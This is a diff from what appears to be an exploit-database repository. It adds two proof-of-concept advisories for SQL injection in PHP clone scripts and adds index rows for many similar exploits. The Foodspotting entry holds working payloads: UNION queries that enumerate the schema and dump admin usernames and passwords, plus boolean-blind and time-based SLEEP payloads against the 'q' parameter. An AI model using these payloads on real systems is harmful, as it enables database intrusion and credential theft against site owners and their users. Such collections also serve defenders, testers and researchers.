b/exploits/php/webapps/43285.txt @@ -0,0 +1,43 @@ +# # # # # +# Exploit Title: Foodspotting Clone Script 1.0 - 'q' SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/foodspotting-clone/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/quicksearch.php?q=[SQL] +# +# -1'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+- +# +# -1'++UNION(SELECT(1),(SELECT+GROUP_CONCAT(a_id,0x3a,username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+admin_login),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+- +# +# http://server/quicksearch.php?q=-1'++UNION(SELECT(1),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31))--+- +# +# Parameter: q (GET) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: q=1%' AND 5971=5971 AND '%'=' +# +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: q=1%' AND SLEEP(5) AND '%'=' +# +# Type: UNION query +# Title: Generic UNION query (NULL) - 31 columns +# Payload: q=1%' UNION ALL SELECT NULL,CONCAT(0x7178766271,0x4f465861726a486c444f775973474c61656c6143724e785a4c476a50464550547357426e6a56416d,0x7170707871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- DGFC +# +# # # # # \ No newline at end of file diff --git a/exploits/php/webapps/43286.txt b/exploits/php/webapps/43286.txt new file mode 100644 index 000000000..f4d5658f3 --- /dev/null +++ b/exploits/php/webapps/43286.txt @@ -0,0 +1,25 @@ +# # # # # +# Exploit Title: Kickstarter Clone Acript 2.0 - SQL Injection +# Dork: N/A +# Date: 08.12.2017 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/kickstarter-clone-script/ +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/investcalc.php?price=1&projid=[SQL] +# +# +# # # # # \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8c62511ec..216730a57 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -38300,3 +38300,21 @@ id,file,description,date,author,type,platform,port 43265,exploits/php/webapps/43265.txt,"Affiliate MLM Script 1.0 - 'product-category.php?key' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 43266,exploits/php/webapps/43266.txt,"Basic B2B Script 2.0.8 - 'product_details.php?id' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 43267,exploits/php/webapps/43267.txt,"Beauty Parlour Booking Script 1.0 - 'gender' / 'city' SQL Injection",2017-12-09,"Ihsan Sencan",webapps,php,80 +43268,exploits/php/webapps/43268.txt,"Nearbuy Clone Script 3.2 - 'search' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43269,exploits/php/webapps/43269.txt,"Cab Booking Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43270,exploits/php/webapps/43270.txt,"Chartered Accountant Booking Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43271,exploits/php/webapps/43271.txt,"Child Care Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43272,exploits/php/webapps/43272.txt,"CMS Auditor Website 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43273,exploits/php/webapps/43273.txt,"Co-work Space Search Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43282,exploits/php/webapps/43282.txt,"Yoga Class Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43274,exploits/php/webapps/43274.txt,"Consumer Complaints Clone Script 1.0 - 'id' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43275,exploits/php/webapps/43275.txt,"Entrepreneur Job Portal Script 2.0.6 - 'jobsearch_all.php?rid1' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43276,exploits/php/webapps/43276.txt,"Doctor Search Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43281,exploits/php/webapps/43281.txt,"Food Order Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43277,exploits/php/webapps/43277.txt,"E-commerce MLM Software 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43280,exploits/php/webapps/43280.txt,"Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43279,exploits/php/webapps/43279.txt,"Event Calendar Category Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php, +43283,exploits/php/webapps/43283.txt,"Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43284,exploits/php/webapps/43284.txt,"Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43285,exploits/php/webapps/43285.txt,"Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80 +43286,exploits/php/webapps/43286.txt,"Kickstarter Clone Acript 2.0 - 'projid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80